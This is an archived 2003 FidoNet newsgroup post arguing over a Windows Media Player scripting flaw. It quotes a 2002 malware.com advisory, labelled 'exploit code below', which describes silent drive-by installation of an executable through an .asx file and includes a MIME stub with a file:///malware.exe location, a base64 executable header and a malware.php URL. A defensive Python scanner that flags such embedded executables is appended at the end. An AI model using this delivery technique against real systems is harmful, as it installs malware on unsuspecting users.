echo: nthelp
to: Rich
from: Geo.
date: 2003-01-18 07:32:04
subject: Re: More fiction, more nonsense

From: "Geo." 

"Rich"  wrote in message news:3e28fd64{at}w3.nls.net...

>>   Not only does what you identify as the 2002-08-22 issue have nothing to
do with scripting, it is IE issue MS02-47.  The security focus folks
demonstrated their own lack of research here claiming what looks like every
version of WMP is affected when even the description they provide makes it
obvious this is false.<<

The asx file is basically the same thing as a shortcut. The asf file has a
script section in it which media player happily executes; if that isn't
scripting then what is? You try to say IE does the execution, but active
scripting is a shared component with media player; in this context it's
media player that is running the script, not IE.

Nice try though Rich.

Geo. (exploit code below)

Wednesday, August 21, 2002

Dear Mister,

'silent delivery and installation of an executable on the target
computer, no client input other than viewing a web page' default
installation of Internet Explorer and Windows Media Player.

This is truly terrible. In addition to server side '404 errors', cookies
and who knows what else [perhaps user.dat, index.dat, even the old
inbox.mbx], the Windows Media Player appears to be severely affected by
Jelmer codebase too.

Combining the Jelmer codebase, the Sandblad dot bug and the 1 year old
wimpy'flication of the media player [see:
http://www.malware.com/wimpy.html]

1. Create an *.asx meta file as follows:





MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


 http://www.malware.com/malware.php

Important Notes:

1. Suggestions have been made that in this particular instance, the dot bug
is not necessary.
2. Suggestions have been made that the 'open'  "object" hole of
http://online.securityfocus.com/bid/5196 will work just as well
3. Disable Active Scripting
4. Disable Media Download [if you can]
5. Change the default location of "My Music..."
5. Hopefully this will all be a bad memory once all the patches, packs,
whatever are finally released.
6. Forget about the 'glitzy' advertising. Think long and hard about the
products you install
Pathetic Notes:

A.

1. The codebase 'vulnerability' is over 2 years old. Demonstrated in a
different form and mentioned in its current form in June 2000
2. Resurrected in fine fashion at the end of 2001 by the Pull with many
others demonstrating similar thereafter
3. Added to in splendid fashion by Jelmer in July 2002 with key protocol


B. The dot bug by Sandblad of May 2002, patched, not patched, fully
functional to date. With patch and without patch. Not even actually
required in this instance.

C. The malware *.asx meta file and packable transportable  *.wmd of June 2001.

Helpful Notes:

Instead of sitting around trying to think up ways that all these things
cannot work, simply fix it the first time round.  There is no such thing as
'mitigating factors' and 'hurdles'. This is a lie. Pure fantasy. Fiction.
Fix it when you can ! For every way you think it cannot be done, there are
10 ways it actually can !

This concludes our summer session and as we are entering junior high for
the first time in a couple weeks, we need to tinker with our bicycles while
there is still sunlight.

Trust that clarifies matters for you.

Your friend and mine
http://www.malware.com [MVP - malware]

This posting is provided "AS IS" with no warranties, and confers no rights.

Over and Out

--
http://www.malware.com

--- BBBS/NT v4.01 Flag-4
 * Origin: Barktopia BBS Site http://HarborWebs.com:8081 (1:379/1.45)
SEEN-BY: 633/267 270
@PATH: 379/1 633/267

SOURCE: echomail via fidonet.ozzmosis.com
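
A defender-side check for the pattern visible in the quoted advisory (an inline MIME part with a `file:` Content-Location and a base64 body that begins `TVp`, the encoded `MZ` executable magic), as an added example that is not part of the original post. The function names, result fields and sample data are constructed here for illustration.

```python
import base64
import re

HEADER = re.compile(r"^([A-Za-z][A-Za-z-]*):\s*(.*)$")
B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def starts_with_mz(blob):
    """True if the first base64 quantum decodes to the DOS/PE 'MZ' magic."""
    try:
        return len(blob) >= 4 and base64.b64decode(blob[:4]).startswith(b"MZ")
    except ValueError:          # malformed base64 is not an executable header
        return False

def scan_mime_parts(text):
    """Return one finding per inline base64 MIME part that carries an executable."""
    lines = [ln.strip() for ln in text.splitlines()]
    findings, i = [], 0
    while i < len(lines):
        headers = {}
        while i < len(lines) and (m := HEADER.match(lines[i])):
            headers[m.group(1).lower()] = m.group(2).strip()
            i += 1
        if headers.get("content-transfer-encoding", "").lower() != "base64":
            i += 1              # not a base64 part; move past this line
            continue
        while i < len(lines) and not lines[i]:
            i += 1              # blank separator between headers and body
        body = []
        while i < len(lines) and B64_LINE.match(lines[i]):
            body.append(lines[i])
            i += 1
        blob = "".join(body)
        if starts_with_mz(blob):
            loc = headers.get("content-location", "")
            findings.append({"location": loc,
                             "local_path": loc.lower().startswith("file:"),
                             "encoded_len": len(blob)})
    return findings

# Constructed sample: the header layout seen in the post, with a harmless body
# ("MZ" followed by zero bytes) and a benign GIF part for contrast.
SAMPLE = "\n".join([
    "MIME-Version: 1.0", "Content-Location:file:///sample.exe",
    "Content-Transfer-Encoding: base64", "",
    base64.b64encode(b"MZ" + bytes(40)).decode(), "",
    "Content-Location: http://example.invalid/logo.gif",
    "Content-Transfer-Encoding: base64", "",
    base64.b64encode(b"GIF89a" + bytes(12)).decode(),
])
```

Running `scan_mime_parts` over the text of media metafiles or saved web content gives a mail or proxy filter a simple signal: a finding with `local_path` set means the part asks to be written to a local file location.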
